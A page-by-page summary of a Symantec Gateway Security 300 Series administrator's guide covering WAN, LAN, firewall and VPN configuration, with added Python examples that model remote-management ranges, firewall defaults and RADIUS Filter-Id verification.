Symantec 360R - Security Gateway SGS Administration Manual

Symantec™ Gateway Security 300 Series Administrator's Guide
Supported models: Models 320, 360, and 360R

Summary of Contents for Symantec 360R - Security Gateway SGS

  • Page 1 Symantec™ Gateway Security 300 Series Administrator’s Guide Supported models: Models 320, 360, and 360R...
  • Page 2: Technical Support

    Corporation. NO WARRANTY. The technical documentation is being delivered to you AS-IS and Symantec Corporation makes no warranty as to its accuracy or use. Any use of the technical documentation or the information contained therein is at the risk of the user. Documentation may include technical or other inaccuracies or typographical errors.
  • Page 3: Contacting Technical Support

    24 hours a day, 7 days a week worldwide in a variety of languages for those customers enrolled in the Platinum Support program. Advanced features, such as the Symantec Alerting Service and Technical Account Manager role, offer enhanced response and proactive security support. Please visit our Web site for current information on Support Programs.
  • Page 4: Customer Service

    General product information (features, language availability, local dealers); latest information on product updates and upgrades; information on upgrade insurance and maintenance contracts; information on Symantec Value License Program; advice on Symantec’s technical support options; nontechnical presales questions; ...
  • Page 5: Table Of Contents

    Contents. Chapter 1, Introducing the Symantec Gateway Security 300 Series: Intended audience 12; Where to get more information 12. Chapter 2, Administering the security gateway: Accessing the Security Gateway Management Interface 13; Using the SGMI 15; Managing administrative access ...
  • Page 6 Load balancing 51; SMTP binding 52; Binding to other protocols 52; Failover 52; DNS gateway 53; Optional network settings 54. Chapter 4, Configuring internal connections: Configuring LAN IP settings 57; Configuring the appliance as DHCP server 58; Monitoring DHCP usage ...
  • Page 7 Understanding Gateway-to-Gateway tunnels 88; Configuring dynamic Gateway-to-Gateway tunnels 91; Configuring static Gateway-to-Gateway tunnels 93; Sharing information with the remote gateway administrator 96; Configuring Client-to-Gateway VPN tunnels 96; Understanding Client-to-Gateway VPN tunnels 97; Defining client VPN tunnels 99; Setting global policy settings for Client-to-Gateway VPN tunnels 101; Sharing information with your clients 101...
  • Page 8 About troubleshooting 141; Accessing troubleshooting information 143. Appendix B, Licensing: Session licensing for Symantec Gateway Security 300 Series Client-to-Gateway VPN functions 145; Additive session licenses 145; SYMANTEC GATEWAY SECURITY APPLIANCE LICENSE AND WARRANTY AGREEMENT 146...
  • Page 9 Firewall field descriptions 176; Computers tab field descriptions 177; Computer Groups tab field descriptions 179; Inbound Rules field descriptions 180; Outbound Rules tab field descriptions 181; Services tab field descriptions 182; Special Application tab field descriptions 183; Advanced tab field descriptions 186; VPN field descriptions 187; Dynamic Tunnels tab field descriptions 189; Static Tunnels tab field descriptions 193...
  • Page 11: Introducing The Symantec Gateway Security 300 Series

    ■ All features are designed specifically for the small business. These appliances are perfect for stand-alone environments or as a complement to Symantec Gateway Security 5400 Series appliances deployed at hub sites. All of the Symantec Gateway Security 300 Series models are wireless-capable.
  • Page 12: Intended Audience

    802.11 transceiver and antenna, to allow the highest possible integrated security for wireless LANs, when used with clients running the Symantec Client VPN software. LiveUpdate of firmware strengthens the Symantec Gateway Security 300 Series security response, making it a perfect solution for small businesses.
  • Page 13: Administering The Security Gateway

    Security Gateway Management Interface (SGMI). The SGMI is a standalone management console for local management and log viewing. This guide describes how to use the SGMI to manage Symantec Gateway Security 300 Series appliances. The SGMI is a browser-based console where you can create configurations, view status, and access logs.
  • Page 14 Figure callouts: Command buttons; Right pane content. Note: The wireless features do not appear in the SGMI until a compatible Symantec Gateway Security WLAN Access Point option is properly installed. See the Symantec Gateway Security 300 Series Wireless Implementation Guide for more information.
  • Page 15: Using The Sgmi

    The interface you see when you connect to the SGMI may vary slightly depending on the model you are managing. Table 2-1 describes the ports on each model. Table 2-1 Interfaces by model: Model | Number of WAN | Number of LAN...
  • Page 16: Setting The Administration Password

    SGMI to people who have been given the password. You must have installed the appliance and connected your browser to the SGMI to set the password. See the Symantec Gateway Security 300 Series Installation Guide for more information about setting up the appliance.
  • Page 17: Configuring Remote Management

    To manually reset the password: On the back of the appliance, press the reset button for 10 seconds. Repeat the procedure for configuring a password. See “To manually reset the password” on page 17. Configuring remote management: You can access the SGMI remotely from the WAN side using a computer with an IP address that is within the configured range of IP addresses.
  • Page 18 Figure 2-2 Remote management (callouts: SGMI, Internet, Symantec Gateway Security 300 Series appliance, Protected devices). To configure remote management, specify both a start and end IP address. If you want to remotely manage from only one IP address, type it as both the start and end IP address.
  • Page 19: Managing The Security Gateway Using The Serial Console

    In the End IP Address text boxes, type the last IP address (highest in the range). To permit only one IP address, type the same value in both text boxes. To enable remote Trivial File Transfer Protocol (TFTP) upgrades to the appliance’s firmware from the configured IP address range, check Allow Remote Firmware Upgrade.
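The remote-management range and the Allow Remote Firmware Upgrade setting together decide who on the WAN side can reach the SGMI and who can push firmware. TFTP carries no authentication of its own, so once that box is checked the start/end range is the only control on who can load firmware. The following Python is an added example, not code from the appliance or its manual: it models the range as the page describes it (inclusive; a single host is start equal to end) and flags the two settings a reviewer would question. The class and function names, the 16-address threshold in audit(), and the sample addresses are assumptions.

```python
import ipaddress

# Added example modelling the SGMI remote-management settings; not code from
# the Symantec appliance. Names, the audit threshold and the sample addresses
# are assumptions made for this example.


class RemoteManagementPolicy:
    """Start/end IPv4 range (inclusive) plus the Allow Remote Firmware Upgrade box."""

    def __init__(self, start_ip, end_ip, allow_remote_firmware_upgrade=False):
        self.start = ipaddress.IPv4Address(start_ip)
        self.end = ipaddress.IPv4Address(end_ip)
        if self.end < self.start:
            raise ValueError("end IP address must not be lower than the start IP address")
        self.allow_remote_firmware_upgrade = allow_remote_firmware_upgrade

    def address_count(self):
        """Number of addresses the range admits; 1 when start == end."""
        return int(self.end) - int(self.start) + 1

    def permits_sgmi(self, source_ip):
        """True if a WAN-side source address may reach the SGMI."""
        return self.start <= ipaddress.IPv4Address(source_ip) <= self.end

    def permits_tftp_upgrade(self, source_ip):
        """TFTP has no authentication of its own, so this range plus the
        checkbox is the whole control on who can push firmware to the box."""
        return self.allow_remote_firmware_upgrade and self.permits_sgmi(source_ip)


def audit(policy, max_addresses=16):
    """Findings a reviewer would raise before accepting the configuration."""
    findings = []
    n = policy.address_count()
    if n > max_addresses:
        findings.append(f"range covers {n} addresses; narrow it to the management hosts you actually use")
    if policy.allow_remote_firmware_upgrade and n > 1:
        findings.append(f"remote TFTP firmware upgrade is enabled for {n} addresses, not a single host")
    return findings


if __name__ == "__main__":
    # Constructed sample values (RFC 5737 documentation addresses).
    single = RemoteManagementPolicy("203.0.113.10", "203.0.113.10", allow_remote_firmware_upgrade=True)
    print(single.permits_sgmi("203.0.113.10"), audit(single))
    wide = RemoteManagementPolicy("203.0.113.0", "203.0.113.255", allow_remote_firmware_upgrade=True)
    print(audit(wide))
```

Because the manual's recommendation for a single management host is to enter the same address as start and end, audit() treats any wider range with firmware upgrade enabled as a finding rather than relying on the reader to notice it.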
  • Page 20 In the terminal program, set the program to connect directly to the COM port on your computer to which the appliance is physically connected. Set the communication settings as follows: Baud (Bits per second) 9600; Data bits...
  • Page 21 Start IP Address: type 4 to enter the first IP address in the range that the DHCP server can allocate. Finish IP Address: type 5 to enter the last IP address in the range that the DHCP server can allocate.
  • Page 23: Configuring A Connection To The Outside Network

    See the Symantec Gateway Security 300 Series Installation Guide for worksheets to plan the configuration. Symantec Gateway Security 300 Series model 320 has one WAN port to configure. Models 360 and 360R appliances have two WAN ports that you can...
  • Page 24: Network Examples

    Network examples Figure 3-1 shows a network diagram of a Symantec Gateway Security 300 Series that is connected to the Internet. The termination point represents any network termination type. This is a device that may be provided by your Internet Service Provider (ISP), or a network switch.
  • Page 25 Management Interface (SGMI). The protected network communicates through the Symantec Gateway Security 300 Series appliance to the Internet. Figure 3-1 Connection to the Internet (callouts: Internet, Termination point, Symantec Gateway Security 300 Series...)
  • Page 26 In this scenario, the appliance protects an enclave of the larger internal network from unauthorized internal users. Enclave traffic from the protected network passes through the Symantec Gateway Security 300 Series and through the Symantec Gateway Security 5400 Series to the Internet.
  • Page 27: Understanding The Setup Wizard

    You can re-run the Setup Wizard at any time after the initial installation. To run the Setup Wizard, on the WAN/ISP > Main Setup window, click Run Setup Wizard. See the Symantec Gateway Security 300 Series Installation Guide for more information.
  • Page 28: Understanding Connection Types

    and whether it applies to both WAN ports or if you must configure each separately. Table 3-1 WAN port configurations: Configuration | Which WAN port? Connection types: configure a connection type for each WAN port; see “Understanding connection types”...
  • Page 29 Typical dial-up accounts are analog (through a normal phone line connected to an external modem) and ISDN (through a special phone line). Typical broadband accounts are broadband cable, DSL, T1/E1, or T3 connected to a terminal adaptor.
  • Page 30: Configuring Connectivity

    Table 3-3 Broadband connection types (Continued): Connection type | Services | Network termination types. Static IP (Static IP & DNS): Broadband cable | Cable modem; Digital Subscriber Line (DSL) | DSL modem; Channel Service Unit/Digital Service Unit (CSU/DSU); Direct Ethernet | Ethernet cable (usually an enclave...
  • Page 31: Pppoe

    To select DHCP as your connection type (see “Main Setup tab field descriptions” on page 164): In the SGMI, in the left pane, click WAN/ISP. For model 320, do the following: In the right pane, on the Main Setup tab, under Connection Type, click ...
  • Page 32 By default, all settings are associated with Session 1. For multi-session PPPoE accounts, configure each session individually. If you have multiple PPPoE accounts, assign each one to a different session in the SGMI. Before configuring the WAN ports to use a PPPoE account, gather the following information: User name and password...
  • Page 33 In the Idle Time-out text box, type the number of minutes of inactivity after which you want the appliance to disconnect from the PPPoE account. If you have a static IP PPPoE Internet account, in the Static IP Address text box, type the IP address.
  • Page 34: Static Ip And Dns

    Connecting manually to your PPPoE account: You can manually connect to or disconnect from your PPPoE account. For model 360 or 360R, you can manually control the connection for either WAN port. This is useful to troubleshoot the connection to the ISP.
  • Page 35 In the right pane, on the Static IP & DNS tab, under WAN IP, in the IP Address text boxes, type the desired IP address of the external (WAN) side of the Symantec Gateway Security 300 Series appliance. In the Network Mask text box, type the network mask. ...
  • Page 36: Pptp

    TCP/IP-based network. Symantec Gateway Security 300 Series appliances act as a PPTP access client (PAC) when you connect to a PPTP Network Server (PNS), generally with your ISP.
  • Page 37 For model 320, do the following: In the right pane, on the Main Setup tab, under Connection Type, click PPTP. Click Save. For model 360 or 360R, do the following: Under WAN1 (External), in the Connection Type drop-down list, click ...
  • Page 38 For model 360 and 360R, do the following: In the right pane, on the PPTP tab, under WAN Port, in the WAN Port drop-down list, select the WAN port to connect. Under Manual Control, click Connect.
  • Page 39: Dial-Up Accounts

    320 appliance. Figure 3-3 Rear panel of Symantec Gateway Security model 320 appliance (callout: Serial port). Figure 3-4 shows the serial port on the rear panel of the model 360 and 360R...
  • Page 40 Figure 3-4 Rear panel of Symantec Gateway Security model 360 and 360R appliances (callout: Serial port). Before configuring the appliance to use your dial-up account as either the primary or backup connection, gather the following information and equipment: Account information: User name, which may be different from your account name, and password for the dial-up account.
  • Page 41 To configure your primary dial-up account: In the SGMI, in the left pane, click WAN/ISP. In the right pane, on the Main Setup tab, under Connection Type, click Analog/ISDN. Click Save. On the Dial-up Backup &...
  • Page 42 To enable the backup dial-up account: In the SGMI, in the left pane, click WAN/ISP. On the Dial-up Backup and Analog/ISDN tab, under Backup Mode, do the following: Check Enable Backup Mode. ...
  • Page 43: Configuring Advanced Connection Settings

    ISP to allocate a new IP address to the appliance. You can tell the appliance at any time to request a new IP address, by forcing a DHCP renew. However, you should only do this if requested by Symantec Technical Support.
  • Page 44: Advanced Ppp Settings

    To configure advanced DHCP settings: You can configure the idle renew time and manually force a DHCP renew request (see “Advanced tab field descriptions” on page 175). To configure idle renew: In the SGMI, in the left pane, click WAN/ISP.
  • Page 45: Maximum Transmission Unit (Mtu)

    DHCP Idle Renew settings to their default values. Configuring dynamic DNS The Symantec Gateway Security 300 Series can use a dynamic DNS service to map dynamic IP addresses to a domain name to which users can connect.
  • Page 46 When you create an account with TZO, they send you the following information to log in and use your account: key (password), email (user name), and domain. Gather this information before configuring the appliance to use TZO. For more information about TZO dynamic DNS, go to http://www.tzo.com.
  • Page 47: Forcing Dynamic Dns Updates

    When you force a dynamic DNS update, the appliance sends its current IP address, host name, and domain to the service. Do this only if requested by Symantec Technical Support. For model 320, you can force a dynamic DNS update for the WAN port. For model 360 or 360R, you can force a dynamic DNS update for WAN1, WAN2, or both ports.
  • Page 48: Disabling Dynamic Dns

    Click Save. Configuring routing If you install Symantec Gateway Security 300 Series appliances on a network with more than one directly connected router, you must specify to which router to send traffic. The appliance supports two types of routing: dynamic and static.
  • Page 49: Configuring Static Route Entries

    To enable dynamic routing (see “Routing tab field descriptions” on page 174): In the SGMI, in the left pane, click WAN/ISP. On the Routing tab, under Dynamic Routing, check Enable RIP v2. Click Save.
  • Page 50: Configuring Advanced Wan/Isp Settings

    To edit a route entry: In the SGMI, in the left pane, click WAN/ISP. On the Routing tab, under Static Routes, in the Route Entry drop-down list, select a route entry. Under Static Routes, change information in any of the fields.
  • Page 51: Load Balancing

    Click Save. Load balancing Symantec Gateway Security 300 Series model 360 and 360R appliances each have two WAN ports. On these appliances, you can configure high availability and load balancing (HA/LB) between the two WAN ports. You can set the percentage of packets that is sent over WAN1 or WAN2. You enter a percentage only for WAN1;...
  • Page 52: Smtp Binding

    SMTP binding: Use SMTP binding when you have two different Internet connections with different ISPs used over different WAN ports. It ensures that email sent by a client goes over the WAN port associated with your email server. If the SMTP server is on the same subnet as one of the WAN ports, the security gateway automatically binds the SMTP server to that WAN port, and you do not have to specify the bind information.
  • Page 53: Dns Gateway

    If a line is physically disconnected, then the line is considered disconnected and the appliance attempts to route traffic to the serial port or the other WAN port. If the cable is not physically disconnected, the appliance performs line checking every few seconds to determine if a line is active.
  • Page 54: Optional Network Settings

    Some ISPs authenticate by the physical (MAC) address of your Ethernet port. This is common with broadband cable (DHCP) services. You can clone your computer’s adapter address to connect to your ISP with the Symantec Gateway Security 300 Series. This is called MAC cloning or masking.
  • Page 55 In the right pane, on the Main Setup tab, under Optional Network Settings, in the Host Name text box, type a host name. The host and domain names are case-sensitive. In the Domain Name text box, type the domain name for the appliance.
  • Page 57: Configuring Internal Connections

    Configuring port assignments. LAN settings let you configure your Symantec Gateway Security 300 Series appliance to work in a new or existing internal network. Each appliance is assigned an IP address and netmask by default. You can change this IP address and netmask. This way, you can specify an IP address and netmask for the appliance that fits your existing network.
  • Page 58: Configuring The Appliance As Dhcp Server

    network already uses 192.168.0.x, you can change the appliance’s IP address to 10.10.10.x, so you do not have to reconfigure your existing network. You can change the appliance’s IP address and netmask at any time. The default IP address is 192.168.0.1 and the default netmask is 255.255.255.0.
  • Page 59 the appliance, adjust the DHCP IP address range appropriately. See “To change the DHCP IP address range” on page 60. Table 4-1 shows the default start and end IP addresses for each model. The default range is based on the recommended number of concurrent clients for each model.
  • Page 60: Monitoring Dhcp Usage

    VPN clients to connect to LAN resources. You can connect many network devices to the LAN ports: routers, switches, client machines, or other Symantec Gateway Security 300 Series appliances. For these options, select the Standard port assignment. If you are connecting a...
  • Page 61: Standard Port Assignment

    Standard port assignment: When LAN ports are designated as standard, the appliance acts as a typical switch: it forwards traffic based on MAC address, and traffic does not reach the security gateway engine unless it was specifically designated for it. This option does not support client VPN tunnels terminating at the LAN.
  • Page 63: Network Traffic Control

    Configuring advanced options. The Symantec Gateway Security 300 Series appliance includes firewall technology that lets you configure the firewall component to meet your security policy requirements. When configuring the firewall, identify all computers (nodes) to be protected on your network.
  • Page 64: Understanding Computers And Computer Groups

    What kinds of users will be protected by the security gateway? Will all users have the same access and privileges? What types of services do you want to make available to internal users? ...
  • Page 65: Defining Computer Group Membership

    Defining computer group membership: Configuring computers is the first step in configuring the firewall component of the appliance. When creating your security policy, assign the largest group of hosts to the Everyone computer group to minimize the input and management of MAC addresses.
  • Page 66 If the computer is an application server to which you want an inbound rule to allow access, or if you want to reserve an IP address for a computer that is not an application server, under Application Server, check Reserve Host.
  • Page 67: Defining Computer Groups

    Defining computer groups: Computer groups are logical groups of network entities used for outbound rules. You must configure and bind all local hosts (nodes) to the computer group they are in by using the Computers tab. See “Defining computer group membership”...
  • Page 68: Defining Inbound Access

    Defining inbound access: Inbound rules control the type of traffic flowing into application servers on your appliance-protected networks. The default state for inbound traffic is that all traffic is denied (automatically blocked) until you configure inbound rules for each kind of traffic you want to allow.
  • Page 69: Defining Outbound Access

    In the right pane, on the Inbound Rules tab, on the Rule drop-down list, select an existing inbound rule. Click Select. Make the changes to the inbound rules fields. Click Update. The configured rule is displayed in the Inbound Rules List. To delete an inbound rule: In the left pane, click Firewall.
  • Page 70 VPN PPTP, LiveUpdate, SESA Server, SESA Agent, RealAudio1, RealAudio2, RealAudio 3, PCA TCP, PCA UDP, TFTP, SNMP. If you have services that are not on this list, or a service that does not use its default port, you can create your own custom services.
  • Page 71 service. If computer group 1 has no rules, all outbound traffic is allowed by default. Figure 5-1 shows a diagram of these examples. Figure 5-1 Outbound rules example (callouts: Outbound rule, Name: E_Mail_1, Computer group: ...; Outbound rule, Name: FTP_2, Computer group: ...)
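The two defaults on these pages point in opposite directions: inbound traffic to an application server is blocked until an inbound rule allows it, while a computer group with no outbound rules gets all outbound traffic allowed. The Python below is an added example, not the appliance's code, that models that asymmetry together with the MAC-to-group binding from the Computers tab, so the effect of leaving a group without rules can be checked before the policy is saved. The names, the Everyone fallback for a MAC that is not bound anywhere, and the assumption that a group with at least one rule denies services it does not list are mine, not the manual's.

```python
from dataclasses import dataclass, field

# Added example modelling the firewall defaults described on these pages;
# not code from the Symantec appliance. Names are assumptions.

EVERYONE = "Everyone"   # the built-in group the page says unbound hosts belong to


@dataclass(frozen=True)
class Rule:
    name: str
    service: str        # service name as on the Services tab, e.g. "SMTP", "FTP"
    action: str         # "allow" or "deny"


@dataclass
class Firewall:
    # MAC address (lower-case) -> computer group, as bound on the Computers tab
    members: dict = field(default_factory=dict)
    # computer group -> outbound rules; an absent or empty entry means "no rules",
    # which the page says allows all outbound traffic for that group
    outbound: dict = field(default_factory=dict)
    # application server IP -> inbound rules; absent means nothing is allowed in
    inbound: dict = field(default_factory=dict)

    def bind(self, mac, group):
        """Bind a host to a computer group (the Computers tab step)."""
        self.members[mac.lower()] = group

    def group_of(self, mac):
        return self.members.get(mac.lower(), EVERYONE)

    def outbound_allowed(self, mac, service):
        rules = self.outbound.get(self.group_of(mac), [])
        if not rules:
            return True             # default: a group with no rules sends anything
        for rule in rules:
            if rule.service == service:
                return rule.action == "allow"
        return False                # assumption: a group with rules denies unlisted services

    def inbound_allowed(self, server_ip, service):
        for rule in self.inbound.get(server_ip, []):
            if rule.service == service and rule.action == "allow":
                return True
        return False                # default: all inbound denied until a rule allows it

    def wide_open_groups(self):
        """Groups that have hosts (or Everyone) but no outbound rules at all."""
        used = set(self.members.values()) | {EVERYONE}
        return sorted(g for g in used if not self.outbound.get(g))


if __name__ == "__main__":
    # Constructed sample policy, not taken from a real appliance.
    fw = Firewall()
    fw.bind("00:11:22:33:44:55", "Group1")
    fw.bind("AA:BB:CC:DD:EE:FF", "Group2")
    fw.outbound["Group2"] = [Rule("E_Mail_1", "SMTP", "allow")]
    print(fw.outbound_allowed("00:11:22:33:44:55", "FTP"), fw.wide_open_groups())
```

wide_open_groups() is the check worth running after every change: it lists the groups that silently inherit the allow-everything default, including Everyone, which is where the page tells you to put the bulk of your hosts.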
  • Page 72: Configuring Services

    To update an existing outbound rule: In the SGMI, in the left pane, click Firewall. In the right pane, on the Outbound Rules tab, under Computer Groups, on the Computer Group drop-down list, select a computer group. To see a list of rules for the selected computer group, click View.
  • Page 73: Redirecting Services

    port number. For protocols that use a single port number, the Listen on Port starting and ending port numbers are the same. Redirecting services: You can also configure services to be redirected from the ports on which they would normally enter (Listen on Port) to another port (Redirect to Port).
  • Page 74: Configuring Special Applications

    In the Redirect to Port(s): End text box, type a port number. Click Add. To update an existing service: In the SGMI, in the left pane, click Firewall. In the right pane, on the Services tab, on the Application drop-down list, select an existing service.
  • Page 75 Port triggers can be used very quickly (milliseconds), but for only one computer at a time. The speed with which port triggers are used gives the illusion of allowing multiple computers to have the same ports opened. Special Applications entries work best with applications that require low throughput.
  • Page 76: Configuring Advanced Options

    Click Delete. Configuring advanced options The Symantec Gateway Security 300 Series has several advanced firewall options for special circumstances. Enabling the IDENT port Queries to the IDENT port (113) normally result in the host name and company name information being returned.
  • Page 77: Disabling Nat Mode

    Exposed Host (DMZ) has problems connecting from behind the security gateway, use the None setting. The following list includes the supported IPsec types: 1 SPI: ADI - Assured Digital; 2 SPI: Standard (Symantec, Cisco Pix, and Nortel Contivity) clients; 2 SPI-C: Cisco Concentrator 30X0 Series clients...
  • Page 78: Configuring An Exposed Host

    Other: Redcreek Ravlin; None. Note: Only change the IPsec pass-thru setting if required to do so by Symantec Technical Support. To configure IPsec pass-thru settings (see “Advanced tab field descriptions” on page 186): In the SGMI, in the left pane, click Firewall.
  • Page 79: Managing Icmp Requests

    Managing ICMP requests: By default, the security gateway does not respond to ICMP requests sent to the WAN ports from outside. You can configure the security gateway to block or allow ICMP requests on the WAN. ICMP requests on the LAN side are always answered. To manage ICMP requests (see “Advanced tab field descriptions”...
  • Page 81: Establishing Secure Vpn Connections

    Internet) to safely transport sensitive data. VPNs are used to allow a single user or remote network to access the protected resources of another network. Symantec Gateway Security 300 Series appliances support three types of VPN tunnels: Gateway-to-Gateway, Client-to-Gateway, and wireless Client-to-Gateway.
  • Page 82: About Using This Chapter

    If you do not have significant network or IT experience or have never configured a security gateway (Symantec or otherwise), you should read the first half of each section before configuring the feature.
  • Page 83 You cannot change the transform proposal list on the appliance; however, this information may be useful to give to the remote gateway administrator. Table 6-1 lists the order of the Symantec Gateway Security 300 IKE proposals. Table 6-1 IKE proposal order...
  • Page 84: Creating Custom Phase 2 Vpn Policies

    and then later associate them with multiple secure tunnels. You can select a pre-defined policy, or you can create your own using the VPN Policies tab. VPN policies group together common characteristics for tunnels, and allow rapid setup of additional tunnels with the same characteristics.
  • Page 85: Viewing Vpn Policies List

    In the SA Lifetime text box, type the number of minutes you want the security association to stay alive before a rekey occurs. The VPN tunnel is temporarily interrupted when rekeys occur. In the Data Volume Limit text box, type the number of kilobytes of traffic to allow before a rekey occurs.
  • Page 86: Understanding User Types

    Understanding user types: Users authenticate directly with the security gateway when connecting through a VPN tunnel. Users are defined on the security gateway Client Users tab. Users with extended authentication are not defined on the security gateway; they are defined on a RADIUS authentication server.
  • Page 87 To configure users (see “Client Users tab field descriptions” on page 199): In the SGMI, in the left pane, click VPN. In the right pane, on the Client Users tab, under VPN User Identity, in the User Name text box, type the name of a new user.
  • Page 88: Viewing The User List

    In the RADIUS Group Binding text box, type the name of the user’s RADIUS group. The RADIUS group is assigned to the user on the RADIUS server. The RADIUS server must return the value that you type in the RADIUS Group Binding text box in the filterID (Filter-Id) attribute.
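For extended authentication the gateway admits a RADIUS-authenticated user to a group only when the server's reply carries the configured binding value in the Filter-Id attribute (RADIUS attribute type 11 in RFC 2865; the page spells it filterID). The Python below is an added example, not code from the appliance, showing what the gateway side of that check has to do: parse the Access-Accept, verify the Response Authenticator against the shared secret, and match Filter-Id against the configured group. The function names, the shared secret, the request authenticator and the sample reply are constructed for this example; the attribute numbers and the authenticator formula are from RFC 2865.

```python
import hashlib
import hmac
import struct

# Added example of gateway-side handling of a RADIUS Access-Accept; not the
# Symantec appliance's code. Attribute numbers and the Response Authenticator
# construction follow RFC 2865.
ACCESS_ACCEPT = 2
ACCESS_REJECT = 3
FILTER_ID = 11          # Filter-Id: the attribute the page calls "filterID"
REPLY_MESSAGE = 18


def encode_attrs(attrs):
    """Encode (type, value bytes) pairs as RADIUS AVPs: type, length, value."""
    out = bytearray()
    for attr_type, value in attrs:
        if len(value) > 253:
            raise ValueError("attribute value too long")
        out += struct.pack("!BB", attr_type, len(value) + 2) + value
    return bytes(out)


def decode_attrs(blob):
    """Walk the AVP list, refusing lengths that would run past the packet."""
    attrs, i = [], 0
    while i < len(blob):
        if len(blob) - i < 2:
            raise ValueError("truncated attribute header")
        attr_type, length = blob[i], blob[i + 1]
        if length < 2 or i + length > len(blob):
            raise ValueError("bad attribute length")
        attrs.append((attr_type, bytes(blob[i + 2:i + length])))
        i += length
    return attrs


def sign_response(code, ident, request_auth, attr_blob, secret):
    """Build a reply with a valid Response Authenticator:
    MD5(Code | ID | Length | RequestAuth | Attributes | Secret)."""
    header = struct.pack("!BBH", code, ident, 20 + len(attr_blob))
    resp_auth = hashlib.md5(header + request_auth + attr_blob + secret).digest()
    return header + resp_auth + attr_blob


def verify_response(packet, request_auth, secret):
    """True only if the packet is well formed and its authenticator checks out."""
    if len(packet) < 20:
        return False
    header, resp_auth, attr_blob = packet[:4], packet[4:20], packet[20:]
    if struct.unpack("!H", header[2:4])[0] != len(packet):
        return False
    expected = hashlib.md5(header + request_auth + attr_blob + secret).digest()
    return hmac.compare_digest(expected, resp_auth)


def accepted_group(packet, request_auth, secret, configured_group):
    """True when a verified Access-Accept carries a Filter-Id equal to the
    RADIUS Group Binding configured on the gateway. A reply with no Filter-Id,
    a different one, a bad authenticator, or a Reject must not admit the user."""
    if not verify_response(packet, request_auth, secret):
        return False
    if packet[0] != ACCESS_ACCEPT:
        return False
    ids = [v.decode("utf-8", "replace")
           for t, v in decode_attrs(packet[20:]) if t == FILTER_ID]
    return configured_group in ids


# Constructed sample exchange, not a real capture.
SECRET = b"example-shared-secret"
REQUEST_AUTH = bytes(range(16))
SAMPLE_ACCEPT = sign_response(
    ACCESS_ACCEPT, 7, REQUEST_AUTH,
    encode_attrs([(FILTER_ID, b"vpn-sales"), (REPLY_MESSAGE, b"Welcome")]),
    SECRET)

if __name__ == "__main__":
    print(accepted_group(SAMPLE_ACCEPT, REQUEST_AUTH, SECRET, "vpn-sales"))
```

The authenticator check matters as much as the Filter-Id match: without it, anything that can spoof the RADIUS server's address can hand a user whatever group it likes.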
  • Page 89 Symantec Gateway Security 300 Series security gateways support creating a VPN tunnel to up to five remote subnets behind Symantec Enterprise Firewall or Symantec Gateway Security 5400 Series appliances, but not to another Symantec Gateway Security 300 Series appliance or Symantec Firewall/VPN Appliance.
  • Page 90 If you have another (additional) subnet on the LAN side of the Symantec Gateway Security 300 Series security gateway, VPN client tunnels to the LAN side of the security gateway are not supported for computers on this separate subnet.
  • Page 91: Configuring Dynamic Gateway-To-Gateway Tunnels

    Creating VPN tunnels to Symantec Gateway Security 5400 Series clusters: To create a VPN tunnel to a Symantec Gateway Security 5400 Series appliance high-availability/load balancing cluster, define the VPN tunnel using the virtual IP address of the cluster. Tunnels between Symantec Gateway Security 300 Series and Symantec Gateway Security 5400 Series appliances are supported in high-availability only.
  • Page 92 succeed. If the key matches, then the Security Parameter Index (SPI), authentication, and encryption keys are automatically generated and the tunnel is created. The security gateway usually re-keys (generates a new key) automatically at set intervals to ensure the continued integrity of the key. Configuration tasks for dynamic Gateway-to-Gateway tunnels: Table 6-4...
  • Page 93: Configuring Static Gateway-To-Gateway Tunnels

    On the VPN Policy drop-down list, select the VPN policy to bind to the tunnel. If you have a multi-session PPPoE ISP account, under Local Security Gateway, in the PPPoE Session drop-down list, select the PPPoE session to bind to the tunnel.
  • Page 94 you chose. For each method, a key length is shown for both ASCII characters and Hex characters. Table 6-5 defines encryption key lengths. Table 6-5 Encryption key lengths (Method / Key length in character bytes / Key length in Hex) 18 (0x + 16 hex digits) 3DES...
  • Page 95 10 In the Authentication Key text box, type the authentication key to match the chosen VPN policy. 11 Under Remote Security Gateway, in the Gateway Address text box, type the gateway address to be the gateway address of the Symantec Enterprise VPN.
  • Page 96: Sharing Information With The Remote Gateway Administrator

    (Optional) Local phase 1 ID Configuring Client-to-Gateway VPN tunnels Client-to-Gateway VPN tunnels let remote users running the Symantec Client VPN software (or any IPsec-compliant VPN client software) connect safely over the Internet to a network secured by a Symantec security gateway.
  • Page 97: Understanding Client-To-Gateway Vpn Tunnels

    Symantec Gateway Security 300 Series supports Client-to-Gateway VPN tunnel configurations. A Client-to-Gateway configuration is created when a workstation, running Symantec Client VPN software, connects to the security gateway from either inside the protected network or from a remote location through the Internet.
  • Page 98 LAN IP screen. “Configuring LAN IP settings” on page 57. Symantec Client-to-Gateway VPN tunnels require a client ID and a shared key. You can also apply extended authentication using a RADIUS server to Client-to- Gateway VPN tunnels for additional authentication.
  • Page 99: Defining Client Vpn Tunnels

    ■ If you enable content filtering for remote WAN-side VPN clients, you must have DNS servers on the local LAN. In Symantec Client VPN version 8.0, you can define two different tunnels: one for WAN which uses the domain name, and one for LAN, which uses the IP address.
  • Page 100 11 To enable AVpe, under WAN Client Policy, do the following: ■ Check Enable Antivirus Policy Enforcement. ■ To log a warning to the Symantec Gateway Security log that a user who is not compliant with the AVpe policy is connecting, click Warn Only.
  • Page 101: Setting Global Policy Settings For Client-To-Gateway Vpn Tunnels

    Setting global policy settings for Client-to-Gateway VPN tunnels Some settings are configurable at a global level for Client-to-Gateway VPN tunnels. These settings configure the Phase 1 ID type for all client VPN tunnels connecting to the security gateway.
  • Page 102: Monitoring Vpn Tunnel Status

    Table 6-10 Information to give clients (Information / Value): RADIUS user name (Optional); RADIUS shared secret (user with extended authentication) (Optional); Phase 1 ID (Optional). Monitoring VPN tunnel status The VPN Status window lets you view the status for each configured dynamic and static Gateway-to-Gateway VPN tunnel.
  • Page 103: Advanced Network Traffic Control

    ■ Managing content filtering lists ■ Monitoring content filtering Advanced network traffic control features of the Symantec Gateway Security 300 Series appliance include antivirus policy enforcement (AVpe) and content filtering. AVpe lets you monitor client antivirus configurations and, if necessary, enforce...
  • Page 104: How Antivirus Policy Enforcement (Avpe) Works

    AVpe monitors the AV configuration of supported Symantec connected policy masters and client workstations attempting to gain access to your corporate network. See the Symantec Gateway Security 300 Series Release Notes for the version of the product you are using to determine the supported AV products and how their configuration and usage differs from the following information.
  • Page 105: Before You Begin Configuring Avpe

    Clients who have been denied access can still connect to Symantec AntiVirus Corporate Edition or Symantec LiveUpdate servers to update their virus definitions. You determine whether to enforce antivirus compliance for local clients using computer groups.
  • Page 106: Configuring Avpe

